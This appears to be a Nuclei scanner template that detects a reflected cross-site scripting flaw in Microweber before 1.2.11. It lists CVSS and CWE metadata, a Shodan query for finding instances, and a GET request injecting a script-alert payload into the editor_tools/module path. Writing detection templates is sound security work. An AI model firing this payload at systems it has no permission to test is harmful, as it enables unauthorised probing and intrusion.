id: microweber-xss

info:
  name: Microweber Cross-Site Scripting
  author: gy741
  severity: high
  description: Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber.
  reference:
    - https://github.com/microweber/microweber/issues/809
    - https://github.com/microweber/microweber
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
    shodan-query: http.favicon.hash:780351152
  tags: microweber,xss,oss

http:
  - method: GET
    path:
      - '{{BaseURL}}/editor_tools/module?type=files/admin"><script>alert(document.domain)</script>&params=filetype=images#path='

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>" 0="filetype=images"'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100e490fbc91ae892c5dd7c3456049489a13ae7cae767398620fde9ba5799cf1800022100db79ef9d0bfc5d9ee1363437dae9823156376b1eb73c6cf0afa43be85b5f5b14:922c64590222798bb761d5b6d8e72950
